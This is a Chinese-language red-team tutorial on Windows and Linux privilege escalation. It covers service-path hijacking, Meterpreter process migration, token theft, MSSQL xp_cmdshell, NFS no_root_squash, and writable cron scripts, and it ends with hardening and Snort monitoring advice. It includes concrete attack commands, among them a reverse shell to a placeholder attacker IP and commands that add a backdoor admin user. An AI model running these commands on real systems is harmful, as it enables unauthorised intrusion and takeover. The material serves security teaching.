免责声明：

该文章所涉及到的安全工具和技术仅做分享和技术交流学习使用，使用时应当遵守国家法律，做一位合格的白帽专家。

使用本工具的用户需要自行承担任何风险和不确定因素，如有人利用工具做任何后果均由使用者承担，本人及文章作者还有泷羽sec团队不承担任何责任 如本文章侵权，请联系作者删除

红队与内网提权

在网络安全的庞大版图中，红队扮演着极为特殊且关键的角色。简单来说，红队就像是一群模拟真实攻击者的 “白帽子”，他们运用各种技术手段和策略，对目标网络系统展开攻击测试，以此来检验目标的安全防御能力。红队的存在，犹如给网络安全防御体系打了一剂 “预防针”，通过真实场景的模拟，让防御者能够提前发现潜在的安全隐患，进而有针对性地进行加固和修复。

而内网提权，是红队在攻击过程中常用的一种关键手段。当红队成功突破目标网络的外部防线，进入到内网环境后，往往最初获取的权限是有限的，可能只是普通用户权限。但这对于红队的目标来说远远不够，他们需要进一步提升权限，获取更高的控制级别，例如从普通用户权限提升到管理员权限，甚至是系统权限。只有这样，才能更深入地挖掘目标网络中的敏感信息，实现更全面的攻击测试。内网提权就像是一把 “万能钥匙”，能够帮助红队打开更多隐藏在网络深处的 “大门”，获取更多的资源和权限，为后续的攻击行动奠定坚实的基础。

内网提权基础概念

（一）权限的 “江湖地位”

在 Windows 系统中，权限的划分就像是一个等级森严的 “江湖” ，不同的权限等级拥有不同的 “江湖地位” 和能力。Users 组的成员就像是初入江湖的小角色，他们拥有的权限十分有限，只能执行一些基本的日常操作，比如运行普通的应用程序、访问自己的文件等，但对于系统关键区域和重要设置，他们只能望而却步。

Administrator 则如同江湖中的一派掌门，拥有广泛的管理权限。他们可以对系统进行各种配置和管理，安装软件、修改系统设置、管理用户账户等操作都不在话下，几乎可以掌控整个系统的大部分运行。

System 权限更像是江湖中的武林盟主，权限凌驾于 Administrator 之上。System 权限的用户能够直接与硬件交互，执行底层操作，对系统的核心组件和敏感文件拥有绝对的控制权，比如可以读取系统中极其敏感的 SAM 文件等。

而 TrustedInstaller 权限则是站在 “江湖” 顶端的存在，堪称神秘的幕后主宰。即使是拥有 System 权限的用户，在面对一些系统文件时也无能为力，因为这些文件需要 TrustedInstaller 权限才能修改。在对 C:WindowsSystem32 目录下的某些关键文件进行操作时，System 权限下的 cmd 使用 move 或 del 等指令都可能会被拒绝，只有 TrustedInstaller 权限才能对这些文件进行更改。

Linux 系统中，权限的划分基于用户和文件的所有者、所属组以及其他用户。root 用户是系统的超级管理员，相当于江湖中的武林至尊，拥有至高无上的权限，可以对系统中的所有文件和目录进行任意操作，包括读取、写入、执行等，能够掌控整个系统的命脉。普通用户则像是江湖中的普通侠客，权限受到严格限制，只能在自己的权限范围内活动，对其他用户的文件和系统关键区域的访问受到诸多限制。文件的权限又分为读（r）、写（w）、执行（x）三种，通过不同的组合来确定用户对文件的操作权限。例如，一个文件的权限设置为 “rwxr-xr--”，表示文件所有者拥有读、写、执行权限，所属组用户拥有读和执行权限，其他用户只有读权限。

（二）提权的 “华山论剑”

提权，简单来说，就是在已获取一定权限的基础上，进一步提升自己的权限等级，以获取更多的系统控制权。在这个过程中，又分为纵向提权和横向提权两种方式，它们就像是两种不同的 “武功秘籍”，各有各的特点和用途。 纵向提权，是从低权限角色向高权限角色的跨越，就像是一个武林新手努力修炼，从无名小卒逐渐成长为武林高手的过程。在渗透测试中，当我们最初获得的可能只是一个普通用户的权限，就如同初入江湖的小角色，能力有限。但通过利用系统或应用程序中的漏洞、配置错误等，我们可以像找到绝世武功秘籍一样，提升自己的权限，比如从普通用户权限提升到管理员权限，甚至是系统权限。

在 Windows 系统中，利用系统内核溢出漏洞，通过精心构造的攻击代码，突破系统的权限限制，从而实现从低权限用户到高权限用户的转变，就像一个武林新手偶然获得了一本顶级武功秘籍，实力瞬间大增。

横向提权，则是在同一权限级别下，获取其他同级别角色的权限，有点类似于在江湖中，不同门派的弟子互相交流学习，获取对方的资源和能力。在渗透测试中，当我们已经在一台主机上获取了某个用户的权限后，通过密码复用、漏洞利用等方式，获取同一网络中其他主机上相同权限的用户账号，就实现了横向提权。在一个企业内网中，通过破解某个员工的账号密码，然后利用这个账号登录到其他员工的电脑上，获取相同的权限，就像是在江湖中，一个门派的弟子通过某种手段，掌握了另一个门派弟子的绝技，从而扩大了自己的势力范围。

在渗透测试中，提权的必要性不言而喻。低权限级别就像是给我们戴上了重重枷锁，会受到很多限制。在 Windows 系统中，如果没有管理员权限，就无法获取散列值，这对于进一步破解用户密码、扩大攻击范围来说是一个巨大的阻碍；无法安装软件，就不能在目标系统上部署一些强大的攻击工具；无法修改防火墙规则，就难以突破目标系统的安全防御，自由进出网络；无法修改注册表，就无法对系统的关键设置进行篡改，实现更深入的控制。而提权，就像是解开这些枷锁的钥匙，让我们能够突破限制，获取更多的权限和信息，实现更全面的攻击测试。

常见提权技术与方法

（一）Windows 系统提权术

服务启动 “暗度陈仓”原理：Windows 服务通常以较高权限运行，利用服务启动进行提权，就是通过修改服务的配置，让其在启动时执行我们指定的恶意程序，从而获取高权限。比如，当我们发现某个服务的配置存在漏洞，低权限用户可以修改其启动路径，将原本的服务二进制文件路径替换为恶意程序的路径 ，当服务启动时，恶意程序就会以服务的高权限运行。

操作示例：首先，我们使用命令 “sc qc 服务名” 来查询服务的配置信息，找到可利用的服务。假设我们发现一个名为 “TestService” 的服务，其启动路径存在可写权限。我们可以使用 “sc config TestService binpath= "恶意程序路径"” 命令来修改服务的启动路径，将其指向我们上传的恶意程序，例如一个具有提权功能的可执行文件。然后，使用 “sc start TestService” 命令启动服务，此时恶意程序就会以服务的权限运行，从而实现提权。

进程注入 “借尸还魂”MSF 进程注入：Metasploit Framework（MSF）是一款强大的渗透测试工具，它提供了丰富的模块来实现进程注入提权。在 MSF 中，我们可以使用 “migrate” 命令将当前的 Meterpreter 会话迁移到一个具有更高权限的进程中。当我们已经获取了一个低权限的 Meterpreter 会话后，使用 “ps” 命令查看目标系统中的进程列表，找到一个高权限的进程 ID，比如 “1234”，然后执行 “migrate 1234” 命令，就可以将会话迁移到该高权限进程中，从而提升权限。 CS 进程注入：Cobalt Strike（CS）同样支持进程注入提权。在 CS 中，我们首先需要获取一个会话，然后通过 “Spawn As” 功能，选择一个高权限的进程进行注入。在 CS 的界面中，右键点击已获取的会话，选择 “Spawn As”，在弹出的菜单中选择目标高权限进程，即可完成注入提权。

两者差异对比：MSF 的进程注入功能相对较为灵活，通过命令行操作可以实现更精细的控制，并且拥有大量的模块和脚本支持，适用于各种复杂的渗透场景。而 CS 的进程注入操作则更加直观，通过图形化界面进行操作，对于新手来说更容易上手，同时 CS 在团队协作和持久化控制方面具有优势。
令牌窃取 “偷天换日”MSF 令牌窃取：在 MSF 中，我们可以使用 “incognito” 模块来实现令牌窃取。首先，使用 “use incognito” 命令加载该模块，然后使用 “list_tokens -u” 命令列出当前系统中可用的令牌，找到目标令牌，比如 “NT AUTHORITYSYSTEM” 令牌，最后使用 “impersonate_token 'NT AUTHORITYSYSTEM'” 命令来窃取该令牌，从而获取相应的权限。 CS 令牌窃取：在 CS 中，当我们获取了一个具有一定权限的会话后，通过 “Tokens” 菜单下的 “Steal Token” 功能来窃取令牌。在 CS 的界面中，右键点击会话，选择 “Tokens” - “Steal Token”，然后在列表中选择目标令牌进行窃取，成功后即可使用该令牌的权限执行操作。

实际案例展示：在一次渗透测试中，我们通过其他方式获取了一个普通用户的权限，然后利用 MSF 的令牌窃取技术，成功窃取了 “NT AUTHORITYSYSTEM” 令牌，从而获取了系统的最高权限。从获取的会话中，我们可以看到权限从普通用户提升到了 SYSTEM，能够执行各种高权限操作，如修改系统关键文件、查看敏感信息等。

数据库提权 “曲线救国”以 MSSQL 为例：首先，我们需要获取 MSSQL 数据库的用户密码。这可以通过多种方式实现，比如从网站的配置文件中获取，或者利用漏洞进行密码破解。当我们获取到数据库用户密码后，使用工具如 “sqlcmd” 进行连接。在命令行中输入 “sqlcmd -S 服务器地址 -U 用户名 -P 密码”，即可连接到 MSSQL 数据库。然后，利用数据库的权限，我们可以建立数据库代理，通过执行系统命令来提升权限。 例如，使用 “EXEC sp_configure'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;” 命令开启 “xp_cmdshell” 扩展存储过程，然后使用 “EXEC xp_cmdshell 'net user 用户名 密码 /add'” 命令添加一个具有管理员权限的用户，从而实现提权。

（二）Linux 系统提权法

NFS 服务 “里应外合”原理：NFS（Network File System）是一种网络文件系统协议，允许不同的计算机之间共享文件和目录。当 NFS 服务器配置不当，例如设置了 “no_root_squash” 选项时，客户端以 root 身份访问共享目录时，将拥有与服务器 root 用户相同的权限。 操作步骤：首先，我们使用 “showmount -e 服务器地址” 命令来枚举 NFS 共享，查看哪些目录可以被挂载。假设我们发现服务器的 “/home/share” 目录可以被挂载，并且设置了 “no_root_squash” 选项。我们在本地创建一个挂载点，例如 “/mnt/nfs_share”，然后使用 “mount -o rw,vers=3 服务器地址:/home/share /mnt/nfs_share” 命令将 NFS 共享挂载到本地。挂载成功后，我们可以在挂载目录中创建一个具有 SUID 权限的文件，比如 “cp /bin/bash /mnt/nfs_share/bash && chmod +s /mnt/nfs_share/bash”，然后在服务器上执行该文件，即可获取 root 权限。
Cron 任务 “定时炸弹”信息收集：Cron 任务是 Linux 系统中用于定时执行任务的工具。我们可以使用 “crontab -l” 命令查看当前用户的 Cron 任务配置，也可以使用 “ls -l /etc/cron*” 命令查看系统的 Cron 配置文件，寻找可利用的 Cron 任务。 权限获取与提升：假设我们发现一个由 root 用户创建的 Cron 任务，其执行的脚本文件存在可写权限，例如 “/etc/cron.daily/backup.sh”。我们可以修改该脚本文件，在其中添加恶意命令，比如 “echo 'bash -i >& /dev/tcp/攻击者IP/端口 0>&1' >> /etc/cron.daily/backup.sh”，当 Cron 任务定时执行该脚本时，就会向攻击者的 IP 地址发送一个反向 Shell，从而获取 root 权限。

内核溢出 “终极杀招”信息收集与漏洞筛选：首先，我们使用 “uname -a” 命令收集目标系统的内核信息，包括内核版本、架构等。然后，根据收集到的内核信息，在漏洞库中筛选出对应的内核溢出漏洞，比如在 “https://www.exploit-db.com/” 等漏洞库中查找相关漏洞。 利用提权脚本：当找到合适的漏洞后，下载对应的提权脚本，例如 “CVE-2016-5195” 漏洞的提权脚本。在目标系统上执行提权脚本，通常需要先给脚本添加执行权限，即 “chmod +x 提权脚本名”，然后执行脚本，如 “./提权脚本名”。如果漏洞利用成功，我们可以看到权限从普通用户提升到了 root 权限，能够执行各种系统级别的操作。

提权实战案例剖析

（一）实战背景 “迷雾重重”

在本次模拟的内网渗透测试中，我们面对的是一个企业的内网环境。通过社会工程学手段，我们成功地让一名企业员工点击了包含恶意链接的邮件，从而在其办公电脑上植入了一个简单的后门程序。通过这个后门程序，我们获取了该员工的普通用户权限，这台办公电脑位于企业内网的一个子网中，IP 地址为 192.168.1.100 。虽然已经进入了内网，但普通用户权限能做的事情非常有限，我们的目标是进一步提升权限，获取更多的敏感信息，所以一场紧张刺激的提权之旅就此展开。

（二）提权过程 “步步惊心”

信息收集 “初露锋芒”：进入内网后，我们首先使用 “ipconfig /all” 命令查看网络配置信息，了解到该子网的网关为 192.168.1.1，DNS 服务器为 192.168.1.2。然后，使用 “net view” 命令查看局域网内的其他共享资源，发现了一台名为 “FileServer” 的文件服务器，其 IP 地址为 192.168.1.110。接着，我们使用 “systeminfo” 命令收集目标主机的系统信息，包括操作系统版本为 Windows 10 专业版，补丁安装情况等。通过分析这些信息，我们发现系统存在一些未修复的漏洞，这为我们后续的提权提供了可能。

服务启动提权 “崭露头角”：在对目标主机的服务进行排查时，我们发现一个名为 “BackupService” 的服务，其启动路径存在可写权限。我们使用 “sc qc BackupService” 命令查询该服务的配置信息，确认了其启动路径为 “C:Program FilesBackupBackup.exe”。然后，我们使用 “sc config BackupService binpath= "C:WindowsSystem32cmd.exe /c net user hacker Passw0rd! /add && net localgroup administrators hacker /add"” 命令修改服务的启动路径，使其在下次启动时执行添加管理员用户的命令。最后，使用 “sc start BackupService” 命令启动服务，成功添加了一个名为 “hacker”，密码为 “Passw0rd!” 的管理员用户。

进程注入提权 “更上一层楼”：虽然已经获取了管理员权限，但为了进一步提升权限，我们决定尝试进程注入。我们使用 MSF 获取了一个 Meterpreter 会话，然后使用 “ps” 命令查看目标系统中的进程列表，发现 “lsass.exe” 进程具有较高权限，其进程 ID 为 1234。接着，使用 “migrate 1234” 命令将 Meterpreter 会话迁移到 “lsass.exe” 进程中，成功提升了权限，能够执行更多的系统操作。  进程注入提权命令及结果截图 令牌窃取提权 “登峰造极”：在获取了较高权限后，我们还想获取系统的最高权限 ——SYSTEM 权限。我们使用 MSF 的 “incognito” 模块来实现令牌窃取。首先，使用 “use incognito” 命令加载该模块，然后使用 “list_tokens -u” 命令列出当前系统中可用的令牌，找到 “NT AUTHORITYSYSTEM” 令牌，最后使用 “impersonate_token 'NT AUTHORITYSYSTEM'” 命令来窃取该令牌，成功获取了 SYSTEM 权限。此时，我们已经完全掌控了目标主机，可以对系统中的敏感信息进行任意操作。

防范与应对策略

（一）系统加固 “铜墙铁壁”

在系统配置方面，无论是 Windows 系统还是 Linux 系统，都应遵循最小权限原则。在 Windows 系统中，对于普通用户，应仅赋予其执行日常任务所需的最小权限，避免用户拥有过多不必要的权限，从而降低因权限滥用导致的安全风险。在文件访问权限设置上，严格限制普通用户对系统关键文件和目录的访问，只允许管理员等特定用户进行读写操作。对于 Linux 系统，同样要合理设置用户和文件的权限。对于一些敏感的系统配置文件，如 “/etc/sudoers”，要确保只有 root 用户可以修改，并且对文件的权限设置为 “440”，即所有者有读权限，所属组有读权限，其他用户无任何权限，防止权限被非法修改。

定期更新系统补丁是防范提权攻击的关键措施之一。操作系统厂商会不断发布安全补丁来修复已知的漏洞，这些漏洞往往是攻击者进行提权的重要途径。以 Windows 系统为例，微软会定期发布月度安全更新，其中包含了大量的漏洞修复。用户应及时开启自动更新功能，确保系统能够及时获取并安装这些补丁。在 Windows 10 系统中，用户可以通过 “设置” - “更新和安全” - “Windows 更新” 路径，将自动更新选项设置为开启状态，系统会在后台自动下载和安装最新的补丁。 对于 Linux 系统，不同的发行版有不同的更新方式。Ubuntu 系统可以使用 “apt-get update” 和 “apt-get upgrade” 命令来更新系统软件包和内核，确保系统的安全性。

权限管理也是系统加固的重要环节。在 Windows 系统中，合理分配用户权限可以有效防止权限滥用。可以通过组策略来管理用户权限，将不同权限的用户划分到不同的组中，然后为每个组分配相应的权限。创建一个 “普通用户组”，将普通员工的账号加入该组，然后为该组设置只允许访问特定的文件夹和执行特定的应用程序的权限；创建一个 “管理员组”，将管理员账号加入该组，赋予其对系统的全面管理权限。在 Linux 系统中，除了 root 用户外，其他用户的权限应根据其工作需要进行精细划分。对于开发人员，可以为其创建一个专属用户组，并赋予该组对开发相关目录的读写权限，但限制其对系统关键区域的访问。

（二）安全监测 “明察秋毫”

利用安全工具实时监测系统异常是防范提权攻击的重要手段。入侵检测系统（IDS）和入侵防御系统（IPS）是常用的安全监测工具。IDS 可以实时监测网络流量和系统日志，通过分析流量和日志中的数据，发现异常行为，如大量的端口扫描、异常的登录尝试等。当检测到异常行为时，IDS 会及时发出警报，通知管理员进行处理。IPS 则不仅能够检测异常行为，还可以主动采取措施进行防御，如阻断可疑的网络连接、禁止特定的 IP 地址访问等。

以 Snort 为例，它是一款开源的 IDS/IPS 工具。在安装和配置 Snort 后，它可以实时监测网络流量。当检测到有恶意的 SQL 注入攻击流量时，Snort 会根据预设的规则进行分析和判断，如果确定是攻击行为，它会立即发出警报，并可以根据配置进行相应的阻断操作。在 Snort 的配置文件中，可以定义各种规则，如 “alert tcp any any -> 192.168.1.0/24 80 (msg:"SQL Injection Attempt"; content:"' OR 1=1 --"; nocase;)”，这条规则表示当检测到任何源 IP 地址和端口，向 192.168.1.0/24 网段的 80 端口发送包含 “' OR 1=1 --” 内容的 TCP 流量时，就会触发警报，提示可能存在 SQL 注入攻击。

设置关键指标报警也是安全监测的重要环节。可以对系统的一些关键指标进行实时监测，如 CPU 使用率、内存使用率、登录失败次数等。当这些指标超过预设的阈值时，立即发出警报。在 Windows 系统中，可以使用性能监视器（PerfMon）来监测系统性能指标。通过设置性能监视器的警报规则，当 CPU 使用率连续 5 分钟超过 80% 时，就向管理员发送邮件或短信通知，以便管理员及时排查原因，防止可能的提权攻击导致系统资源被滥用。在 Linux 系统中，可以使用 “top” 命令实时查看系统资源使用情况，结合一些监控工具，如 Zabbix，设置当内存使用率超过 90% 时触发警报，及时发现系统异常。

总结与展望

红队内网提权技术是一把双刃剑，对于网络安全研究和防御测试有着重要的价值，但一旦被不法分子利用，就会对个人、企业乃至国家的网络安全造成巨大的威胁。通过对 Windows 和 Linux 系统常见提权技术的学习，以及实际案例的剖析，我们深入了解了提权的过程和方法。同时，我们也认识到，防范提权攻击需要从系统加固和安全监测等多个方面入手，构建一个全方位的网络安全防护体系。 随着技术的不断发展，未来的提权技术可能会更加复杂和隐蔽，对安全防护提出了更高的挑战。一方面，攻击者可能会利用人工智能、机器学习等新技术，开发出更智能、更高效的提权工具和方法，使攻击更加难以检测和防范。利用机器学习算法分析系统的行为模式，寻找潜在的提权漏洞，然后自动生成针对性的攻击代码。另一方面，随着物联网、云计算等新兴技术的广泛应用，网络环境变得更加复杂，提权攻击的面也会更广。在物联网环境中，大量的智能设备连接到网络，这些设备可能存在安全漏洞，容易被攻击者利用进行提权攻击，进而控制整个物联网系统。 面对这些挑战，我们需要不断加强网络安全技术的研究和创新，提高安全防护的能力。加强对新兴技术安全风险的研究，提前制定相应的防护策略；利用人工智能和机器学习技术，实现对网络安全的实时监测和智能预警，及时发现和处理提权攻击行为。同时，也需要加强网络安全意识的教育和培训，提高用户和管理员的安全意识，让大家共同参与到网络安全防护中来，共同维护网络空间的安全和稳定。  未来网络安全防护概念图